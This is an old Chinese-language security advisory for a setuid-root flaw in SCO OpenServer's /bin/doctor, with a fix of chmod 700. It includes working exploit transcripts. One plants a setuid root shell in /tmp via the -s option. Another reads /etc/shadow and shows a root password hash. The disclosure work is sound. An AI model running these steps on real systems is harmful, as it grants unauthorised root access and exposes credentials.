SCO openserver /bin/doctor安全漏洞
发布日期:2000-01-14
更新日期:2000-01-14
受影响系统:SCO openserver 5.0.5
SCO openserver 5.0.4
不受影响系统:SCO openserver 4.2
描述:
SCO openserver中/bin/doctor缺省属主是root,并且被设置了setuid位.Bugtraq中已经有
人报告说普通用户可以通过doctor提供的菜单以root身份执行任何命令.但只有在root运行
doctor进行一些必要的设置后,普通用户才可以访问到它的菜单.因此,如果root没有运行过
doctor,普通用户就不能利用这个漏洞.但lgwu发现doctor存在一个更严重的漏洞,doctor
的-s参数允许任何用户在命令行运行一个shell脚本.因此,普通用户可以轻易得到root权限.
另外,如果用任意的系统文件做-s的参数,该文件的第一行将被显示.
<* 来源 : lgwu (lgwu@ahu.edu.cn) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
----------------- test exploit 1 ---------------------
lgwu$ cat > 1
#!/bin/sh
cp /bin/ksh /tmp/sh
chmod 4755 /tmp/sh
^d
lgwu$ chmod 755 1
lgwu$ /bin/doctor -s ./1
a little while.............
lgwu$ /tmp/sh
#
----------------- test exploit 2 ---------------------
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
建议:
临时解决办法: chmod 700 /bin/doctor
浏览次数:6758
严重程度:0(网友投票)